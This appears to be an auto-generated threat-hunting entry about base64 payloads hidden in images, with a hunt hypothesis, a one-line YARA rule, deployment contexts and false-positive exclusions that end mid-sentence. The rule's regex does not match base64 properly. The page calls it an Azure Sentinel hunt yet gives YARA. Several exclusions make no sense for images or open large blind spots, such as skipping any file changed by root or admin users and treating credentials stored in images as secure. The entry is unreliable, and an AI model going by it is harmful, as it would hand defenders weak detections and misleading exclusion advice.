base64 hidden in image

Hunt Hypothesis

Adversaries may embed base64-encoded payloads within images to exfiltrate data or execute malicious code covertly. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential data exfiltration or command and control channels disguised as benign image files.

YARA Rule

rule base64_hidden_in_image {
    strings: $ = /JPEG-1\.1[a-zA-Z0-9\-\/]{32}/
    condition: any of them
}

Deployment Notes

This YARA rule can be deployed in the following contexts:

• Microsoft Defender for Endpoint — Custom indicators / advanced hunting
• Email Gateway — Attachment scanning
• File Share Monitoring — Periodic scanning of shared drives
• YARA CLI — Manual threat hunting on endpoints
• Source Rule

False Positive Guidance

• Scenario: Image used in a CI/CD pipeline for artifact storage
  Description: A developer uploads an image file to a CI/CD system (e.g., GitHub Actions, GitLab CI) as part of a build artifact, which may contain base64 data in metadata.
  Filter/Exclusion: Exclude files uploaded to CI/CD pipelines using the ci_cd_pipeline tag or check for presence of .git or .build directories in the file path.

• Scenario: Scheduled backup job includes base64-encoded configuration files
  Description: A scheduled backup job (e.g., using rsync, Veeam, or Duplicity) stores base64-encoded configuration files within image files as part of a data compression or encoding strategy.
  Filter/Exclusion: Exclude files that match the backup job’s known file patterns (e.g., backup_*.tar.gz) or check for presence of backup-related metadata in the file name or path.

• Scenario: Admin uses an image file to store base64-encoded credentials for internal tools
  Description: An administrator encodes credentials (e.g., for a Kubernetes secret or a service account) in base64 and stores them in an image file as part of a secure storage strategy.
  Filter/Exclusion: Exclude files that are manually created or modified by admin users (e.g., using sudo or root access) or check for presence of known admin tools in the file metadata.

• Scenario: Image file used for embedding base64 data in a custom application
  Description: A custom application (e.g., a legacy .NET or Java app) uses base64 encoding to embed data (e.g., certificates, keys) within image files for internal use.
  Filter/Exclusion: Exclude files that are known to be used by the application